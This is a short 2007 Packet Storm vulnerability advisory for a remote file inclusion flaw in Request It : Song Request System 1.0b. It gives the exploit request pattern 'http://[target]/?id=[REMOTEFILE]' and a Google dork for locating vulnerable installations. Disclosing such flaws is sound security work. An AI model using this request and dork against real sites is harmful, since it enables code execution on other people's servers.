srs10-rfi.txt

2007-04-10T00:00:00
ID PACKETSTORM:55785
Type packetstorm
Reporter hackberry.ath.cx
Modified 2007-04-10T00:00:00

Description

                                        
                                            `Request It : Song Request System 1.0b - remote file inclusion  
  
Software: Request It : Song Request System  
Type: remote file inclusion  
Version: 1.0b  
Date: 2007-04-09  
Url: http://scripts.ringsworld.com/organizers/requestit/  
Risc: middle  
  
  
------------------------------------  
Credit:  
  
http://hackberry.ath.cx  
mail[AT]hackberry.ath.cx  
  
  
------------------------------------  
Vulnerability:  
  
http://[target]/?id=[REMOTEFILE]  
  
  
------------------------------------  
Google dork:  
  
"[ Request us to play you a song ]"  
`